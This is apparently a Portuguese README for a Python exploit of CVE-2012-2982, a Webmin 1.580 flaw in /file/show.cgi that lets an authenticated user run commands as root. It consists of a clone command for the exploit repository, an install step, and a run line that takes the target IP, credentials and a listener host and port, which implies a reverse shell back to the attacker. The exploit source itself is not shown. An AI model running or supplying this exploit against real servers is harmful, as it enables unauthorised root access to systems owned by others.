
Exploit em Python para CVE-2012-2982
Este script Python foi escrito para a vulnerabilidade no Webmin 1.580, CVE-2012-2982. A vulnerabilidade existe no componente /file/show.cgi e permite que um usuário autenticado, com acesso ao Módulo Gerenciador de Arquivos, execute comandos arbitrários com privilégios de root.
Versão Python testada: Python 3.8.5
Pacote pip necessário: secrets
git clone https://github.com/OstojaOfficial/CVE-2012-2982.git
pip3 install -r requirements.txt
Para executar o exploit use o comando abaixo:
python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>